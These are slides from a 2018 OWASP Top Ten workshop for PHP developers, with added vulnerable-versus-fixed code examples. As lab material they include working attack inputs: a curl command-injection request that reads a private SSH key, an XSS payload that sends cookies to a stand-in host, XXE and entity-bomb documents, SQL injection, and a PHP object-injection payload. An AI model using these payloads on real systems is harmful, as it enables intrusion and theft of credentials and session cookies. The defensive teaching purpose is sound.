Slide 3

Little Bobby Tables Isn't Welcome Here php[tek] 2018 ∙ Eric Mann

Slide 4

Today's Agenda
• Introductions and Setup
• OWASP
• ASR 1 – Injection Exercise
• ASR 2 – Broken Authentication Exercise
• ASR 3 – Sensitive Data Exposure Exercise
• ASR 4 – XML External Entities

Slide 5

Today's Agenda
• ASR 5 – Broken Access Control Exercise
• ASR 6 – Security Misconfiguration
• ASR 7 – Cross-site Scripting Exercise
• ASR 8 – Insecure Deserialization
• ASR 9 – Using Components with Known Vulnerabilities
• ASR 10 – Insufficient Logging & Monitoring
• Responsible Disclosure

Slide 6

INTRODUCTIONS AND SETUP Getting Started

Slide 7

Introduction
• Who am I?
• Who are you?
• What are you hoping to learn this week?
• Project overview
• Project requirements: PHP, SQLite, (Docker, maybe)

Slide 8

Setup
• Clone the project repository
  git clone https://github.com/ericmann/bobby-tables.git php-owasp
• Run the "smoke test" script in the repo to test your system
  cd php-owasp && php smoke.php
  or, through the repo's Docker wrapper:
  cd php-owasp && ./dockphp smoke.php

Slide 9

OWASP

Slide 10

OWASP
• Open Web Application Security Project
• International non-profit, est. ~2001
• Coordinates training, guidelines, development checklists
• Polls and publishes the "Top Ten" application security risks
  • Updated every ~3 years
  • Last published in late 2017 (the 2017 edition, which this workshop follows)
  • Results based on feedback and in-the-wild experiences surveyed from > 500 developers
  • Data spans > 100,000 real-world applications
• The OWASP Top Ten is not exhaustive!

Slide 11

ASR 1 - Injection

Slide 12

Injection

Slide 13

Injection Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. • Injected SQL • Injected CLI

Slide 14

Injection
• Run the demo application
  php -S localhost:8888 -t asr1-injection
• Visit the query interface in a browser
  http://localhost:8888/query
• Inject yourself as a speaker into the database
• Now … fix the injection attack by parameterizing your statement
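
The shape of the fix the exercise asks for, as an added example that is not code from the workshop repository: the same speaker search built by string concatenation and then with a PDO prepared statement, run against an in-memory SQLite database seeded with constructed rows. The table, column and function names are assumptions; it needs the pdo_sqlite extension.

```php
<?php
// Added example, not from the bobby-tables repo. Requires pdo_sqlite.
declare(strict_types=1);

function makeDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Constructed sample table and rows.
    $db->exec('CREATE TABLE speakers (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');
    $db->exec("INSERT INTO speakers (name) VALUES ('Eric Mann'), ('Alice'), ('Bob')");
    return $db;
}

// Vulnerable: the search term is spliced into the SQL text, so a single quote
// in the input closes the string literal and the rest is parsed as SQL.
function searchUnsafe(PDO $db, string $term): array
{
    $sql = "SELECT name FROM speakers WHERE name LIKE '%" . $term . "%'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Fixed: the term travels as a bound parameter. The SQL text is fixed at
// prepare() time, so whatever the user typed can only ever be a value.
function searchSafe(PDO $db, string $term): array
{
    $stmt = $db->prepare('SELECT name FROM speakers WHERE name LIKE :pattern');
    $stmt->execute([':pattern' => '%' . $term . '%']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = makeDb();

// Honest input: both versions agree.
var_dump(searchUnsafe($db, 'Eric'));   // ["Eric Mann"]
var_dump(searchSafe($db, 'Eric'));     // ["Eric Mann"]

// Hostile input: closes the LIKE literal, adds a tautology, comments out the tail.
$payload = "' OR 1=1 --";
var_dump(searchUnsafe($db, $payload)); // every row: ["Eric Mann", "Alice", "Bob"]
var_dump(searchSafe($db, $payload));   // [] : no speaker is literally named "' OR 1=1 --"
```

The LIKE wildcards are added inside the parameter value rather than in the SQL so the pattern is still a single bound string; the same approach works for the INSERT the exercise has you sneak in, which a prepared statement cannot be talked into.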

Slide 15

Injection
• Run the same demo application
  php -S localhost:8888 -t asr1-injection
• Visit the files interface in a browser and download my PDF
  http://localhost:8888/get/?file=evolution.pdf
• Use the vulnerability to "liberate" your private SSH key (quote the URL so your own shell does not treat the ";" as a command separator)
  curl 'http://localhost:8888/get/?file=;cat%20~/.ssh/id_rsa'
• Now … fix the injection attack by sanitizing the filename
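
One way to fix the file handler, as an added example rather than the repository's own code: the vulnerable version hands the request parameter to a shell, the fixed version never starts a shell at all, allow-lists the name, and checks that the resolved path still lives inside the download directory. The directory location, the allowed extensions and the sample file are assumptions.

```php
<?php
// Added example, not from the bobby-tables repo.
declare(strict_types=1);

// Assumed download directory; a temp dir so the demo is self-contained.
define('FILES_DIR', sys_get_temp_dir() . '/bobby-files');

// Vulnerable: the name becomes part of a shell command line, so
// ?file=;cat%20~/.ssh/id_rsa ends "cat <dir>/" and runs a second command.
function getFileUnsafe(string $name): string
{
    return (string) shell_exec('cat ' . FILES_DIR . '/' . $name);
}

// Fixed: no shell. The name must be a plain basename with an allowed
// extension, and after realpath() collapses ".." and symlinks the result must
// still start with the download directory.
function getFileSafe(string $name): string
{
    if (!preg_match('/\A[A-Za-z0-9_-]+\.(pdf|txt)\z/', $name)) {
        throw new InvalidArgumentException('bad file name');
    }
    $base = realpath(FILES_DIR);
    $path = realpath(FILES_DIR . '/' . $name);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('file not found');
    }
    $data = file_get_contents($path);
    if ($data === false) {
        throw new RuntimeException('unreadable');
    }
    return $data;
}

// Constructed sample file so the script runs stand-alone.
if (!is_dir(FILES_DIR)) {
    mkdir(FILES_DIR, 0700, true);
}
file_put_contents(FILES_DIR . '/evolution.pdf', '%PDF-1.4 sample');

echo getFileSafe('evolution.pdf'), PHP_EOL;   // %PDF-1.4 sample

foreach (['../index.php', ';cat ~/.ssh/id_rsa', 'evolution.pdf;id', 'notes.txt'] as $bad) {
    try {
        getFileSafe($bad);
        echo "accepted '$bad' (unexpected)\n";
    } catch (Exception $e) {
        echo "rejected '$bad': {$e->getMessage()}\n";
    }
}
```

If a shell really is unavoidable, wrap the value in escapeshellarg() as well, but the allow-list plus realpath() check is what stops both the command injection and the path traversal that the same parameter invites.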

Slide 16

ASR 2 – Broken Authentication

Slide 17

Broken Authentication Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities. • Authentication bypass • Unauthorized impersonation

Slide 18

Broken Authentication
• Run the demo application
  php -S localhost:8888 -t asr2-broken-authentication
• Visit the application in a browser
  http://localhost:8888/
• Log in as "reader" with the password "1234567"
• Modify your cookies to impersonate "admin"
• Now … fix the impersonation attack by leveraging server storage (the cookie should carry only an opaque session ID; who the user is and what role they have lives server-side)

Slide 19

ASR 3 – Sensitive Data Exposure

Slide 20

Sensitive Data Exposure Many web applications do not adequately protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser. • Example: Equifax

Slide 21

Sensitive Data Exposure

Slide 22

Sensitive Data Exposure

Slide 23

Sensitive Data Exposure
• Open /asr3-data-exposure in your editor
• View the "encrypted" secret message text file
• Modify the secret text to say something else
• Now … use Libsodium to actually encrypt the text
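
What "actually encrypt" looks like with Libsodium, as an added example that is not the repository's solution: secretbox gives authenticated encryption, so the stored file can no longer be edited without the decrypt failing, which is the property the exercise's fake encryption lacks. The key file location, the message and the file names are assumptions; it needs PHP 7.2+ with the sodium extension.

```php
<?php
// Added example, not from the bobby-tables repo. Requires ext/sodium.
declare(strict_types=1);

// The key is 32 random bytes generated once and kept out of the repo (env var,
// secret store, or a file outside the web root). Never derive it from a
// fixed string in the code.
function loadKey(string $path): string
{
    if (!is_file($path)) {
        file_put_contents($path, sodium_crypto_secretbox_keygen(), LOCK_EX);
        chmod($path, 0600);
    }
    $key = file_get_contents($path);
    if ($key === false || strlen($key) !== SODIUM_CRYPTO_SECRETBOX_KEYBYTES) {
        throw new RuntimeException('bad key file');
    }
    return $key;
}

// Encrypt with a fresh random nonce per message; the nonce is not secret and
// is stored in front of the ciphertext.
function sealMessage(string $plain, string $key): string
{
    $nonce = random_bytes(SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    $box = sodium_crypto_secretbox($plain, $nonce, $key);
    return sodium_bin2base64($nonce . $box, SODIUM_BASE64_VARIANT_ORIGINAL);
}

// Decrypt. secretbox_open() returns false if a single bit of nonce or
// ciphertext changed, so tampering is detected, not silently decrypted.
function openMessage(string $encoded, string $key): ?string
{
    try {
        $raw = sodium_base642bin($encoded, SODIUM_BASE64_VARIANT_ORIGINAL);
    } catch (SodiumException $e) {
        return null;
    }
    $min = SODIUM_CRYPTO_SECRETBOX_NONCEBYTES + SODIUM_CRYPTO_SECRETBOX_MACBYTES;
    if (strlen($raw) < $min) {
        return null;
    }
    $nonce = substr($raw, 0, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    $box = substr($raw, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    $plain = sodium_crypto_secretbox_open($box, $nonce, $key);
    return $plain === false ? null : $plain;
}

// Constructed demo: key and "secret message" file live in the temp dir.
$key = loadKey(sys_get_temp_dir() . '/asr3-demo.key');
$secretFile = sys_get_temp_dir() . '/secret.txt';
file_put_contents($secretFile, sealMessage('The cake is a lie', $key));

var_dump(openMessage((string) file_get_contents($secretFile), $key)); // "The cake is a lie"

// Tamper with the stored file the way the exercise edits the "encrypted" text:
// flip one bit of the ciphertext and write it back.
$raw = sodium_base642bin((string) file_get_contents($secretFile), SODIUM_BASE64_VARIANT_ORIGINAL);
$last = strlen($raw) - 1;
$raw[$last] = chr(ord($raw[$last]) ^ 0x01);
file_put_contents($secretFile, sodium_bin2base64($raw, SODIUM_BASE64_VARIANT_ORIGINAL));

var_dump(openMessage((string) file_get_contents($secretFile), $key)); // NULL: MAC check failed
sodium_memzero($key);
```

For data that only ever needs to be compared, not read back (passwords), this is still the wrong tool; use password_hash() instead. Encryption at rest is for secrets the application must recover later.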

Slide 24

ASR 4 – XML External Entities

Slide 25

XML External Entities XML eXternal Entity injection (XXE) is a type of attack against an application that parses XML input. This attack occurs when untrusted XML input containing a reference to an external entity is processed by a weakly configured XML parser. • Data exposure • Simple DoS attacks

Slide 26

XML External Entities (sample XML document; the markup was lost in extraction. What survives: a DOCTYPE declaring an entity named "name", closed by "]>", followed by a body reading "Friend of &name; &name; &name; - 2017")

Slide 28

XML External Entities - FIX (PHP snippet; the opening of the code was lost in extraction and only the final call "loadXML($xml);" survives)

Slide 29

XML External Entities (entity-expansion "bomb" sample; the markup was lost in extraction. What survives: a DOCTYPE declaring an entity named "bomb", closed by "]>", followed by a body consisting of "&bomb;")
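
A hardened parser for both slides above, the external-entity read and the entity bomb, as an added example rather than the fix snippet from the talk: untrusted input is refused if it carries a DTD at all, the entity loader is switched off on PHP versions where it is on by default, and the document is loaded without the flags that would make libxml substitute entities. The three sample documents are constructed.

```php
<?php
// Added example, not from the bobby-tables repo.
declare(strict_types=1);

function parseUntrustedXml(string $xml): DOMDocument
{
    // First gate: untrusted XML has no business declaring a DTD. This textual
    // check is cheap but not the real control (it would miss, say, UTF-16
    // input); the parser settings below are.
    if (preg_match('/<!(DOCTYPE|ENTITY)\b/i', $xml)) {
        throw new InvalidArgumentException('DTD not allowed');
    }
    // PHP < 8.0 resolves external entities unless told not to.
    // (Deprecated in 8.0 because the loader is off by default there.)
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    $prev = libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    // LIBXML_NONET forbids network fetches. Never add LIBXML_NOENT or
    // LIBXML_DTDLOAD here: those are exactly what turn "&name;" into a file read.
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if (!$ok) {
        throw new InvalidArgumentException('malformed XML');
    }
    // Second gate, after parsing: reject anything that still carries a doctype.
    if ($dom->doctype !== null) {
        throw new InvalidArgumentException('DTD not allowed');
    }
    return $dom;
}

// Constructed samples: an honest document, an XXE read, and a nested-entity bomb.
$honest = '<?xml version="1.0"?><greeting><name>Eric</name></greeting>';
$xxe    = '<?xml version="1.0"?>'
        . '<!DOCTYPE x [<!ENTITY name SYSTEM "file:///etc/passwd">]>'
        . '<greeting>Friend of &name; &name; &name; - 2017</greeting>';
$bomb   = '<?xml version="1.0"?>'
        . '<!DOCTYPE x [<!ENTITY a "aaaaaaaaaa">'
        . '<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">'
        . '<!ENTITY bomb "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">]>'
        . '<x>&bomb;</x>';

$dom = parseUntrustedXml($honest);
echo $dom->getElementsByTagName('name')->item(0)->textContent, PHP_EOL; // Eric

foreach (['xxe' => $xxe, 'bomb' => $bomb] as $label => $doc) {
    try {
        parseUntrustedXml($doc);
        echo "$label parsed (unexpected)\n";
    } catch (InvalidArgumentException $e) {
        echo "$label rejected: {$e->getMessage()}\n";
    }
}
```

The same flags apply to simplexml_load_string() and to XMLReader; whichever API the application uses, the rule is the same: no DTD from outside, no entity substitution, no network.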

Slide 30

ASR 5 – Broken Access Control

Slide 31

Broken Access Control Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users' data, change access rights, etc. • Authentication != Authorization

Slide 32

Broken Access Control
• Run the demo application
  php -S localhost:8888 -t asr5-broken-access
• Visit the application in a browser
  http://localhost:8888/
• Log in as "bob" with the password "bobisevil"
• Modify your form to target Alice's user ID (4) – change her favorite ice cream
• Verify it changed – Alice's password is "aliceisnice"
• Now … fix the attack by verifying that the user ID being modified matches the authenticated user
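
The two fixes asked for in the ASR 2 and ASR 5 exercises share one idea, so here is one added example covering both (it is not code from the workshop repository): identity comes from a server-side lookup on an opaque session token, never from a cookie the client can edit, and the record an update touches comes from that identity, never from a form field. The user table, the in-memory session store and the plaintext credential check are constructed stand-ins; a real application stores password_hash() output and uses PHP sessions.

```php
<?php
// Added example, not from the bobby-tables repo.
declare(strict_types=1);

// Constructed user table: id => record. Bob is 3, Alice is 4 as in the exercise.
$users = [
    1 => ['name' => 'admin', 'role' => 'admin', 'icecream' => 'vanilla'],
    3 => ['name' => 'bob',   'role' => 'user',  'icecream' => 'rocky road'],
    4 => ['name' => 'alice', 'role' => 'user',  'icecream' => 'mint chip'],
];

// ASR 2, vulnerable: the client tells us who it is. Editing the cookie to
// "user=admin; role=admin" is the whole attack.
function whoAmIUnsafe(array $cookies): array
{
    return ['user' => $cookies['user'] ?? 'guest', 'role' => $cookies['role'] ?? 'guest'];
}

// ASR 2, fixed: the cookie holds only a random token; the mapping from token
// to user lives on the server (stand-in for $_SESSION storage).
$sessions = [];

function login(array &$sessions, array $users, string $name, string $password): ?string
{
    // Constructed credentials; real code compares password_hash() values.
    $pw = ['bob' => 'bobisevil', 'alice' => 'aliceisnice'];
    if (!isset($pw[$name]) || !hash_equals($pw[$name], $password)) {
        return null;
    }
    foreach ($users as $id => $u) {
        if ($u['name'] === $name) {
            $token = bin2hex(random_bytes(32));
            $sessions[$token] = $id;
            return $token;
        }
    }
    return null;
}

function whoAmI(array $sessions, array $users, string $token): ?array
{
    $id = $sessions[$token] ?? null;
    return $id === null ? null : $users[$id] + ['id' => $id];
}

// ASR 5, vulnerable: the form says which row to change.
function updateIceCreamUnsafe(array &$users, int $formUserId, string $flavour): void
{
    $users[$formUserId]['icecream'] = $flavour;
}

// ASR 5, fixed: a form-supplied id is honoured only when it is the session
// user's own id, or the caller is an admin. Authentication != authorization.
function updateIceCream(array &$users, array $me, int $formUserId, string $flavour): bool
{
    if ($formUserId !== $me['id'] && $me['role'] !== 'admin') {
        return false; // worth logging: this is an attempted IDOR, not a UI bug
    }
    $users[$formUserId]['icecream'] = $flavour;
    return true;
}

var_dump(whoAmIUnsafe(['user' => 'admin', 'role' => 'admin'])); // trusted as admin

$token = login($sessions, $users, 'bob', 'bobisevil');
if ($token === null) {
    exit("login failed\n");
}
$bob = whoAmI($sessions, $users, $token);
var_dump(updateIceCream($users, $bob, 4, 'pistachio')); // false: Alice's row refused
var_dump(updateIceCream($users, $bob, 3, 'pistachio')); // true: Bob's own row
echo $users[4]['icecream'], PHP_EOL;                     // mint chip
```

The simplest version of the ASR 5 fix is to drop the user-ID field from the form altogether and always update the session user; the explicit check above is for the case where admins legitimately edit other accounts.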

Slide 33

ASR 6 – Security Misconfiguration

Slide 34

Security Misconfiguration Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.

Slide 35

Security Misconfiguration
• Server tokens
• Server name
• Directory traversal
• SSL certificates
• Remote include
  • allow_url_fopen
  • allow_url_include
• Display errors
• disable_functions
  • exec
  • passthru
  • shell_exec
  • system
  • proc_open
  • popen
  • parse_ini_file
  • show_source
  • eval
  • create_function
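
A self-check for the php.ini items on this slide, as an added example that is not part of the workshop materials: run it on the server (php audit.php) or from a deploy pipeline and it reports every live setting that differs from the hardened value. The expected values are the usual recommendations, not values from the talk, and the exit code is an assumption.

```php
<?php
// Added example, not from the bobby-tables repo.
declare(strict_types=1);

// Setting => expected value. PHP reads booleans back as "1"/"0"/"" or On/Off.
const EXPECTED_INI = [
    'allow_url_fopen'   => '0', // no fopen("http://...") on user-controlled names
    'allow_url_include' => '0', // remote file inclusion is never legitimate
    'display_errors'    => '0', // stack traces and paths go to the log, not the browser
    'expose_php'        => '0', // drops the X-Powered-By server token
    'log_errors'        => '1',
];

// Functions from the slide that a web SAPI with no reason to spawn processes
// should list in disable_functions.
const DANGEROUS_FUNCTIONS = [
    'exec', 'passthru', 'shell_exec', 'system', 'proc_open', 'popen',
    'parse_ini_file', 'show_source',
];
// Caveat: eval is a language construct and create_function is gone in PHP 8;
// neither can be switched off via disable_functions. Grep your code instead.

function normalizeBool(string $v): string
{
    return in_array(strtolower(trim($v)), ['1', 'on', 'true', 'yes'], true) ? '1' : '0';
}

// Returns human-readable findings; an empty list means every check passed.
function auditIni(): array
{
    $findings = [];
    foreach (EXPECTED_INI as $key => $want) {
        $have = normalizeBool((string) ini_get($key));
        if ($have !== $want) {
            $findings[] = sprintf('%s is %s, expected %s', $key, $have, $want);
        }
    }
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    foreach (DANGEROUS_FUNCTIONS as $fn) {
        if (!in_array($fn, $disabled, true) && function_exists($fn)) {
            $findings[] = "$fn is callable; add it to disable_functions";
        }
    }
    return $findings;
}

$findings = auditIni();
echo $findings ? implode(PHP_EOL, $findings) . PHP_EOL : "php.ini checks passed\n";
exit($findings ? 1 : 0);
```

Run it under the same SAPI as the application (php-fpm or mod_php honour a different ini than the CLI), otherwise it audits the wrong configuration.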

Slide 36

ASR 7 – Cross-site Scripting

Slide 37

Cross-site Scripting XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. • Stored • Reflected

Slide 38

Cross-site Scripting
• Run the demo application
  php -S localhost:8888 -t asr1-injection
• Visit the query interface in a browser
  http://localhost:8888/query
• Inject malicious JavaScript by searching for a script payload (the example string did not survive extraction)
• Now … fix the cross-site scripting by escaping the search term where it is rendered (htmlspecialchars); parameterizing the SQL statement stops SQL injection, not XSS
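
Output escaping for the search page, as an added example that is not the repository's code: the unsafe render echoes the term into the page, the safe render escapes it for the HTML context at the point of output, once for the text node and once inside an attribute. The markup and the two payloads are constructed.

```php
<?php
// Added example, not from the bobby-tables repo.
declare(strict_types=1);

// Vulnerable: whatever was searched for lands in the page verbatim.
function renderUnsafe(string $term): string
{
    return "<p>Results for: $term</p>";
}

// Escape for HTML text and attribute contexts. ENT_QUOTES handles both quote
// styles so the helper is safe inside a double- or single-quoted attribute;
// ENT_SUBSTITUTE keeps malformed UTF-8 from silently producing an empty string.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Fixed: escape at output, in every place the value appears.
function renderSafe(string $term): string
{
    return '<p>Results for: ' . e($term) . '</p>'
         . '<input type="text" name="q" value="' . e($term) . '">';
}

$payload = '<script>document.location="https://evil.example/?c="+document.cookie</script>';
echo renderUnsafe($payload), PHP_EOL; // the script element is parsed and runs
echo renderSafe($payload), PHP_EOL;   // &lt;script&gt;... is displayed as text

// Attribute break-out attempt against the search box.
$payload2 = '" onfocus="alert(1)" autofocus="';
echo renderSafe($payload2), PHP_EOL;  // quotes become &quot;, the value attribute stays closed
```

htmlspecialchars() is the right tool only for HTML text and attribute values. A term reflected into a script block, a URL, or a CSS value needs that context's own encoding, and a user-supplied URL must additionally be checked for a javascript: scheme before it is used in an href.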

Slide 39

ASR 8 – Insecure Deserialization

Slide 40

Insecure Deserialization Native serialization formats (PHP's serialize()/unserialize(), for instance) usually offer more features than JSON or XML, including customizability of the serialization process through magic methods such as __wakeup() and __destruct(). Unfortunately, the features of these native deserialization mechanisms can be repurposed for malicious effect when operating on untrusted data. • Denial of service • Access control • Remote code execution

Slide 41

Insecure Deserialization
$request = file_get_contents('php://input');
$args = json_decode($request, true); // true: decode to an associative array; without it json_decode() returns a stdClass and $args['name'] is an error
$response = [
    'name' => $args['name'],
    'email' => $args['email']
];
echo json_encode($response);
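
Why the slide reaches for JSON rather than unserialize() on the request body, as an added example that is not from the workshop repository: a serialized object payload instantiates any class in the codebase with attacker-chosen properties, and its magic methods run without the application calling anything. The Logger class is a constructed stand-in for such a gadget; the payload, the field names and the validation rules are assumptions (PHP 7.3+ for JSON_THROW_ON_ERROR).

```php
<?php
// Added example, not from the bobby-tables repo.
declare(strict_types=1);

// Constructed gadget: a class whose destructor acts on its own properties.
// Real applications contain plenty of these (loggers, caches, template engines).
class Logger
{
    public $path = '/dev/null';
    public $line = '';

    // Runs when the object is released, i.e. right after unserialize() built
    // it. With attacker-chosen $path and $line this would write anywhere the
    // web user can; here it only announces what it would have done.
    public function __destruct()
    {
        echo "__destruct would append '{$this->line}' to {$this->path}\n";
    }
}

// What an attacker POSTs: a Logger pointing at a path of their choosing.
$payload = 'O:6:"Logger":2:{s:4:"path";s:13:"/tmp/evil.php";s:4:"line";s:5:"hello";}';

// Vulnerable: any class may be instantiated with any properties.
function handleUnsafe(string $body): void
{
    $obj = unserialize($body); // Logger is built here...
    unset($obj);               // ...and its __destruct fires here
}

// Safer: refuse objects. They come back as __PHP_Incomplete_Class, whose
// magic methods never run. Still not a format to accept from strangers.
function handleSafer(string $body): string
{
    $obj = unserialize($body, ['allowed_classes' => false]);
    return $obj instanceof __PHP_Incomplete_Class ? 'object refused' : gettype($obj);
}

// Safest: a data-only format, and only the fields the handler asked for.
function handleJson(string $body): array
{
    $args = json_decode($body, true, 512, JSON_THROW_ON_ERROR);
    if (!is_array($args)) {
        throw new InvalidArgumentException('expected a JSON object');
    }
    return [
        'name'  => (string) ($args['name'] ?? ''),
        'email' => filter_var((string) ($args['email'] ?? ''), FILTER_VALIDATE_EMAIL) ?: null,
    ];
}

handleUnsafe($payload);              // prints the __destruct line: the gadget ran
echo handleSafer($payload), PHP_EOL; // object refused
print_r(handleJson('{"name":"Bobby","email":"bobby@example.com","role":"admin"}'));
// "role" is dropped: nothing the client did not ask for reaches the response
```

If unserialize() of trusted data is unavoidable (a cache you wrote yourself), pass an explicit allowed_classes list and authenticate the blob with an HMAC before decoding it, so that anything not produced by your own code is rejected up front.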

Slide 42

ASR 9 – Using Components with Known Vulnerabilities

Slide 43

Using Components with Known Vulnerabilities

Slide 44

ASR 10 – Insufficient Logging & Monitoring

Slide 45

Insufficient Logging & Monitoring Exploitation of insufficient logging and monitoring is the bedrock of nearly every major incident. Attackers rely on the lack of monitoring and timely response to achieve their goals without being detected. • Attackers' attempts go unnoticed • Insider threats exploit access
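
A minimal audit logger for the events this slide is about, as an added example that is not part of the workshop materials: one JSON record per line for authentication failures and authorization denials (the things an incident responder needs and a default access log does not show), with a per-source failure counter that turns a run of attempts into an alert-worthy record. The field names, the threshold and the sample events are assumptions; the counter is in-memory for the demo, where a real deployment would keep it in shared storage.

```php
<?php
// Added example, not from the bobby-tables repo.
declare(strict_types=1);

final class AuditLog
{
    /** @var resource */
    private $stream;
    private $threshold;
    private $failures = []; // source ip => failure count (in-memory stand-in)

    public function __construct($stream, int $threshold = 5)
    {
        $this->stream = $stream;
        $this->threshold = $threshold;
    }

    // One JSON object per line: trivial to ship to a SIEM, and user-controlled
    // newlines cannot forge a second record because json_encode() escapes them.
    public function event(string $type, array $fields): void
    {
        $record = ['ts' => gmdate('c'), 'event' => $type] + $fields;
        fwrite($this->stream, json_encode($record, JSON_UNESCAPED_SLASHES) . PHP_EOL);
    }

    // Log the failure (never the password) and return true when this source
    // reaches the threshold so the caller can alert or block.
    public function authFailure(string $user, string $ip): bool
    {
        $n = $this->failures[$ip] = ($this->failures[$ip] ?? 0) + 1;
        $this->event('auth_failure', ['user' => $user, 'ip' => $ip, 'count' => $n]);
        if ($n === $this->threshold) {
            $this->event('alert', ['reason' => 'repeated auth failures', 'ip' => $ip, 'count' => $n]);
            return true;
        }
        return false;
    }

    public function authSuccess(string $user, string $ip): void
    {
        unset($this->failures[$ip]);
        $this->event('auth_success', ['user' => $user, 'ip' => $ip]);
    }
}

$log = new AuditLog(STDOUT);

// Constructed: six password guesses for "admin" from one address, then a
// denied cross-account update like the one in the ASR 5 exercise.
for ($i = 1; $i <= 6; $i++) {
    if ($log->authFailure('admin', '203.0.113.7')) {
        // alert line has been written; a real app would also rate-limit here
    }
}
$log->event('authz_denied', ['user' => 'bob', 'action' => 'update', 'target_user' => 4]);
$log->authSuccess('bob', '198.51.100.2');
```

Writing the record is the easy half; the slide's point is the other half. Ship these lines somewhere the application cannot delete them, and make sure the alert record is routed to a person, or the log only documents the breach afterwards.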

Slide 46

Responsible Disclosure

Slide 47

Questions?
